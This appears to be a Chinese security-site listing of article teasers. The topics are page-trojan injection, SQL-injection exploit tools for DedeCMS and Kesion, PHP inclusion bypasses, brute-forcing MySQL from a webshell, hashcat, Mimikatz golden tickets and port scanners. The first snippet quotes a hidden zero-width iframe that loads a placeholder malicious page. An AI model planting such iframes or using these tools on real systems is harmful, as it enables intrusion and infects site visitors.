下面介绍集中常见的网页挂马方式: (1)iframe 框架挂马 在网页上增加一行挂马的程序,例如:<iframe src=http://www.xxx.com/xxx.html width=0 ...
网络安全
DedeCMS全版本通杀SQL注入漏洞利用代码及工具201
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。 近日,网...
php包含漏洞替代技术的方法与介绍 php文件包含漏
================ php包含漏洞替代技术 ================ php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数,特别是include()和require...
PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数...
网络安全
科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第
我就随便改进了下,希望用的到的朋友可以收藏。 第二版改进: 1.检测2条漏洞 2.解决access数据库也出现什么差异备份等脚本上需要优化的问题。 其他也没什么了。 本文转载自『半坑土农民's Blo...
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞
DedeCmsV5.6 本地包含 DedeCmsV5.6 本地包含 http://t00ls.net/thread-8608-1-1.html 之前就发现了这本地包含的利用方法。 复制代码代码如下:&...
神兵利刃
oclhashcat:离线hash密码破解工具官方文档(中文版
无聊中,就把hashcat的官方文档稍微翻译了下,方便初学的朋友查看。至于oclhashcat,它是一个离线的hash密码破解工具,与hashcat不同,它支持GPU破解,速度更快,并且支持更多的ha...
神兵利刃
Mimikatz小实验:黄金票据+dcsync|
这篇博文是为了解释下Benjamin Delpy(@gentilkiwi)在这条推特上写的东西,看官们且耐住性子。 FreeBuf科普时间 krbtgt账户:每个域控制器都有一个“krbtgt”的用户...
神兵利刃
谷歌为MacOS打造开源恶意检测系统|
谷歌最近正致力于打造一款针对MacOS的恶意检测系统,目前它已经在Github上开源。这个由谷歌Macintosh Operations团队开发的项目名叫Santa,现在已经更新到了0.9.12版本。...
神兵利刃
Masscan:最快的互联网IP端口扫描器|
Masscan号称是最快的互联网端口扫描器,最快可以在六分钟内扫遍互联网。 masscan的扫描结果类似于nmap(一个很著名的端口扫描器),在内部,它更像scanrand, unicornscan,...
